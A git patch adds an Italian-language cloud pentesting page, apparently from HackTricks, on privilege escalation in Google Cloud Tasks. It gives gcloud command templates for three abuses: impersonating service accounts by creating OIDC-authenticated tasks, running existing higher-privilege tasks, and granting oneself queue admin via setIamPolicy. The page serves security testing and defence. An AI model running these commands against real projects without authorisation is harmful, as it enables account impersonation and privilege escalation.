From 881a4aa579ab4fcd3644d650b365ebd1124d22b7 Mon Sep 17 00:00:00 2001 From: Translator Date: Mon, 18 Aug 2025 14:23:13 +0000 Subject: [PATCH] Translated ['src/pentesting-cloud/gcp-security/gcp-privilege-escalation/ --- src/SUMMARY.md | 1 + .../gcp-cloudtasks-privesc.md | 45 +++++++++++++++++++ 2 files changed, 46 insertions(+) create mode 100644 src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudtasks-privesc.md diff --git a/src/SUMMARY.md b/src/SUMMARY.md index 66a6a8fd8..7e7cc6609 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -107,6 +107,7 @@ - [GCP - Cloudfunctions Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md) - [GCP - Cloudidentity Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.md) - [GCP - Cloud Scheduler Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.md) + - [GCP - Cloud Tasks Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudtasks-privesc.md) - [GCP - Compute Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md) - [GCP - Add Custom SSH Metadata](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md) - [GCP - Composer Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.md) diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudtasks-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudtasks-privesc.md new file mode 100644 index 000000000..9a437e965 --- /dev/null +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudtasks-privesc.md @@ -0,0 +1,45 @@ +# GCP - Cloud Tasks Privesc + +{{#include ../../../banners/hacktricks-training.md}} + +## Cloud Tasks + +### `cloudtasks.tasks.create`, `iam.serviceAccounts.actAs` + +Un attaccante con questi permessi può **impersonare altri account di servizio** creando attività che vengono eseguite con l'identità dell'account di servizio specificato. Questo consente di inviare **richieste HTTP autenticate ai servizi Cloud Run o Cloud Functions protetti da IAM**. +```bash +gcloud tasks create-http-task \ +task-$(date '+%Y%m%d%H%M%S') \ +--location us-central1 \ +--queue \ +--url 'https://.us-central1.run.app' \ +--method POST \ +--header 'X-Hello: world' \ +--body-content '{"hello":"world"}' \ +--oidc-service-account-email @.iam.gserviceaccount.com +``` +### `cloudtasks.tasks.run`, `cloudtasks.tasks.list` + +Un attaccante con questi permessi può **eseguire attività programmate esistenti** senza avere permessi sull'account di servizio associato all'attività. Questo consente di eseguire attività che sono state precedentemente create con account di servizio con privilegi più elevati. +```bash +gcloud tasks run projects//locations/us-central1/queues//tasks/ +``` +Il principale che esegue questo comando **non ha bisogno del permesso `iam.serviceAccounts.actAs`** sull'account di servizio del task. Tuttavia, questo consente solo di eseguire task esistenti - non concede la possibilità di creare o modificare task. + +### `cloudtasks.queues.setIamPolicy` + +Un attaccante con questo permesso può **assegnare a se stesso o ad altri principali ruoli di Cloud Tasks** su code specifiche, potenzialmente elevando a `roles/cloudtasks.admin` che include la possibilità di creare ed eseguire task. +```bash +gcloud tasks queues add-iam-policy-binding \ + \ +--location us-central1 \ +--member serviceAccount:@.iam.gserviceaccount.com \ +--role roles/cloudtasks.admin +``` +Questo consente all'attaccante di concedere permessi di amministratore completi di Cloud Tasks sulla coda a qualsiasi account di servizio che controllano. + +## Riferimenti + +- [Google Cloud Tasks Documentation](https://cloud.google.com/tasks/docs) + +{{#include ../../../banners/hacktricks-training.md}}